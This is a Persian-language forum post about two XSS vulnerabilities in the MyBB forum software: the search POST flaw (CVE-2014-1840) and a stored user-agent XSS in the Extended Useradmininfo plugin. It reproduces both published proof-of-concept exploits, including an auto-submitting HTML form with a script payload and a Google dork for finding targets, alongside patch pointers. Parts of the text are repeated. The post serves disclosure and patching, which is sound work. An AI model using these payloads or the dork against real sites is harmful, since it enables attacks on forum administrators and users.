سلام بر عزیزان
در ابتدا مروری داریم از آسیب پذیری که در POST جستجو شناسایی شده بود :
برای پنتست این آسیب پذیری میتونید اکسپلویت رو به صورت HTML ذخیره کنید در قسمت action="http://yourmybb.com/search.php" به جای Yourmybb آدرس سایت خود را قرار دهید .
یکی از تیم های امنیتی
که البته اسمشم نمیگم اومد این پچ رو خراب کنه ما هم یه عکس قرار میدیم خاطراتی براش زنده بشه . مجدد متذکر میشم اگر مراحل بصورت کامل انجام شود آسیب پذیری رفع میشود .
![[تصویر: preview?size=large]](http://cld.persiangig.com/cfs/rest/documents/84544/preview?size=large)
http://www.aljyyosh.org/mirror.php?id=98063
تقدیم با عشق
------
آسیب پذیری XSS از نوع High از پلاگین Extended Useradmininfo انجمن ساز مای بی بی
رفع آسیب پذیری :
دموی آسیب پذیری در آپارات :
http://www.aparat.com/v/VmcEs
آسیب پذیری :
http://www.exploit-db.com/exploits/31525
لینک مرجع پلاگین :
http://mods.mybb.com/view/extended-useradmininfo
در ابتدا مروری داریم از آسیب پذیری که در POST جستجو شناسایی شده بود :
کد:
<html>
<!--
Exploit-Title: MyBB 1.6.12 POST XSS 0day
Google-Dork: inurl:index.php intext:Powered By MyBB
Date: Februrary 2nd of 2014
Bug Discovered and Exploit Author: Osanda Malith Jayathissa
Vendor Homepage: http://www.mybb.com
Software Link: http://resources.mybb.com/downloads/mybb_1612.zip
Version: 1.6.12 (older versions might be vulnerbale)
Tested on: Windows 8 64-bit
Video: https://www.youtube.com/watch?v=67MfgixmWgo
Original write-up: http://osandamalith.wordpress.com/2014/02/02/mybb-1-6-12-post-xss-0day
CVE: CVE-2014-1840
-->
<body>
<form name="exploit" action="http://localhost/mybb_1612/Upload/search.php"
method="POST">
<input type="hidden" name="action" value="do_search" />
<input type="hidden" name="keywords"
value="qor'("\2a<script>alert(/XSS/)</script>
" />
<script>document.exploit.submit(); </script>
</form>
</body>
</html>برای پنتست این آسیب پذیری میتونید اکسپلویت رو به صورت HTML ذخیره کنید در قسمت action="http://yourmybb.com/search.php" به جای Yourmybb آدرس سایت خود را قرار دهید .
یکی از تیم های امنیتی
که البته اسمشم نمیگم اومد این پچ رو خراب کنه ما هم یه عکس قرار میدیم خاطراتی براش زنده بشه . مجدد متذکر میشم اگر مراحل بصورت کامل انجام شود آسیب پذیری رفع میشود .http://www.aljyyosh.org/mirror.php?id=98063
تقدیم با عشق
------
آسیب پذیری XSS از نوع High از پلاگین Extended Useradmininfo انجمن ساز مای بی بی
کد:
# Exploit Title: Extended Useradmininfo MyBB Plugin 1.2.1 - Cross Site
Scripting
# Google Dork: N/A
# Date: 09.02.2014
# Exploit Author: Fikri Fadzil - fikri.fadzil@impact-alliance.org
# Vendor Homepage: http://forum.mybboard.de/user-9022.html
# Software Link: http://mods.mybb.com/view/extended-useradmininfo
# Version: 1.2.1
# Tested on: PHP
Description:
This plugin shows advanced Informations about a user, such as last IP, User
Agent, Browser and Operating System. The information will be shown in a
user profile and visible only for people who are able to see the
adminoptions on user profiles.
Proof of Concept
1. Create a user account.
2. Change your user-agent to "Mozilla<script>alert(1)</script>".
3. Login and then... logout.
* The script will be executed whenever the administrator view your profile.
Solution:
Replace the content of "inc/plugins/extendeduseradmininfos.php" with this
fix:
http://pastebin.com/ncQCvwdqرفع آسیب پذیری :
کد:
Solution:
Replace the content of "inc/plugins/extendeduseradmininfos.php" with this
fix:
http://pastebin.com/ncQCvwdqدموی آسیب پذیری در آپارات :
http://www.aparat.com/v/VmcEs
آسیب پذیری :
http://www.exploit-db.com/exploits/31525
لینک مرجع پلاگین :
http://mods.mybb.com/view/extended-useradmininfo
زندگی با امنیت زیباست .
مشاوره امنیتی رایگان برای انجمن mybb کاربران عزیز
contact : hosseinxpr@gmail.com
مشاوره امنیتی رایگان برای انجمن mybb کاربران عزیز
contact : hosseinxpr@gmail.com
